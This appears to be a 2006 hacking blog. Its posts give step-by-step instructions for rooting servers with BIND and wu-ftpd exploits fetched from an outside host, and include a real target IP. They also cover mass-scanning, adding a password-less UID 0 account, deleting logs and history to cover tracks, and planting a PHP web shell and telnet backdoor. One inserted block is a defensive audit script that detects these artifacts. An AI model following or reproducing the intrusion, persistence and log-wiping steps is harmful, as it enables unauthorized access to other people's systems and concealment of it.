Saturday, January 14, 2006

ISC BIND expl Buffer Overflow

Only For

ISC BIND 8.2.2 p7 / ISC BIND 8.2.2 p6
ISC BIND 8.2.2 p5
+ Trustix Trustix Secure Linux 1.1 / 1.0
+ S.u.S.E. Linux 6.4ppc / 6.4alpha / 6.4 / 6.3 alpha / 6.3 / 6.2 / 6.1 alpha / 6.1 / 6.0
+ RedHat Linux 7.0J sparc / 7.0J i386 / 7.0J alpha / 7.0 sparc / 7.0 i386 / 7.0 alpha / 6.2E sparc / 6.2E i386 / 6.2E alpha / 6.2 sparc / 6.2 i386 / 6.2 alpha / 6.1 sparc / 6.1 i386 / 6.1 alpha / 6.0 sparc / 6.0 i386 / 6.0 alpha / 5.2 sparc / 5.2 i386 / 5.2 alpha
+ MandrakeSoft Linux Mandrake 7.2 / 7.1 / 7.0 / 6.1 / 6.0
+ IBM AIX 4.3.3 / 4.3.2 / 4.3.1 / 4.3
+ Debian Linux 2.3 sparc / 2.3 powerpc / 2.3 arm / 2.3 alpha / 2.3 68k / 2.3 / 2.2 sparc / 2.2 powerpc / 2.2 arm / 2.2 alpha / 2.2 68k / 2.2
+ Conectiva Linux 5.1 / 5.0 / 4.2 / 4.1 / 4.0es / 4.0
+ Caldera eServer 2.3 / 2.4
+ Caldera OpenLinux Desktop 2.3
ISC BIND 8.2.2 p4 / 8.2.2 p3 / 8.2.2 p2 / 8.2.2 p1 / 8.2.2 / 8.2.1
ISC BIND 8.2
- Slackware Linux 4.0
- RedHat Linux 6.1 i386 / 6.0 i386 / 5.2 i386 / 5.1 / Standard & Poors ComStock 4.2.4
- RedHat Linux 5.0 / 4.2 / 4.1 / 4.0
- IBM AIX 4.3.2 / 4.3.1 / 4.3
- Caldera OpenLinux 2.2 / 1.3

wget xgoogle.tk - iscbind
chmod
./


local explo 2

Only for Local Rooting

For RedHat 6.x or Mandrake 6.x

wget xgoogle.tk - le6.sh
chmod +x
./

For FreeBSD 2.2.x

wget xgoogle.tk - lebsd22
chmod
./

Success ? You got ROOT


Thursday, January 12, 2006

local explo

shell, two sessions
wget xgoogle.tk ftp.tar & xpost.tar
tar -zxvf
cd

xpost
./scan (ip range) ex : ./scan 202.1
./masswu wu-scan.log
if the message = You Have Root In 211.240.56.254
then
211.240.56.254 > can be broken into

ftp
./awu 211.240.56.254
wait for
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
if whoami = root
then successful

adduser
/usr/sbin/adduser buham -g wheel -s /bin/bash -d /home/buham
passwd buham
if
Changing password for user buham
passwd: all authentication tokens updated successfully
then
user successful

get root access

/usr/sbin/useradd crit -u 0 -d /
passwd -d crit

Done ?
covering tracks...

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

ctrl + d
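
From the defender's side, the steps in this post leave checkable artifacts: a second UID 0 account, an empty password field, a history file pointing at /dev/null, and emptied or missing logs. The audit script below is an added example, not part of the original post; its function names and the sample accounts and hashes are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Every path is a parameter so the
# audit can run against copies of files taken from a suspect host.

# Accounts other than "root" that hold UID 0 in a passwd-format file.
extra_uid0() { awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"; }

# Accounts whose shadow password field is empty (the state `passwd -d` leaves).
empty_passwords() { awk -F: '$2 == "" { print $1 }' "$1"; }

# True when a shell history file has been replaced by a symlink to /dev/null.
history_nulled() { [ -L "$1" ] && [ "$(readlink "$1")" = /dev/null ]; }

# Prints "missing", "empty" (zero bytes) or "ok" for a log file.
log_state() {
    if [ ! -e "$1" ]; then echo missing
    elif [ ! -s "$1" ]; then echo empty
    else echo ok; fi
}

# audit <passwd> <shadow> <history> <log>...  prints one ALERT line per finding.
audit() {
    pw=$1; shadow=$2; hist=$3; shift 3
    for u in $(extra_uid0 "$pw"); do echo "ALERT uid0-account $u"; done
    for u in $(empty_passwords "$shadow"); do echo "ALERT empty-password $u"; done
    if history_nulled "$hist"; then echo "ALERT history-to-devnull"; fi
    for f in "$@"; do
        s=$(log_state "$f")
        [ "$s" = ok ] || echo "ALERT log-$s $(basename "$f")"
    done
}

# Constructed sample tree (placeholder accounts and hashes, not real data).
make_sample() {
    d=$(mktemp -d)
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'alice:x:1000:1000::/home/alice:/bin/bash' \
        'svc2:x:0:0::/:/bin/bash' > "$d/passwd"
    printf '%s\n' 'root:$6$CONSTRUCTED$hash:19000:0:99999:7:::' \
        'alice:$6$CONSTRUCTED$hash:19000:0:99999:7:::' \
        'svc2::19000:0:99999:7:::' > "$d/shadow"
    ln -s /dev/null "$d/.bash_history"
    : > "$d/messages"          # zero-length, as after rm followed by touch
    echo "$d"
}

d=$(make_sample)
audit "$d/passwd" "$d/shadow" "$d/.bash_history" "$d/messages" "$d/lastlog"
rm -rf "$d"
```

On a live host, a zero-length `messages` or `lastlog` on a machine that has been up for a while is itself a finding, since both normally grow from boot.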


Friday, January 06, 2006

BNC

Tired of making bots?
Want to set up psyBNC, but it just won't run?

Ever tried BNC? It's much the same as psyBNC, only it isn't online 24 hours...

wget xgoogle.tk - prebnc.tgz
tar
cd
./bnc

connect to the host on port 56560
pass buham


Shell in PHP

Running CMD commands through an inject? That's hard, and a hassle too. Using a bin backdoor? Doesn't run? Using CGI Telnet? No way, there's no CGI-BIN access...

Here is the alternative

wget xgoogle.tk - shellphp.txt
mv

run it through the browser...

just like in PuTTY :)


Monday, January 02, 2006

Backdoor dor dor dor

One of the techniques used after we have successfully gotten into a server, before carrying out further penetration/rooting, is usually to plant a backdoor, one of whose functions is to get back into that server, etc.

wget xgoogle.tk - bintty
chmod
./bintty

done

open putty
telnet
PORT 1109
pass buhamania

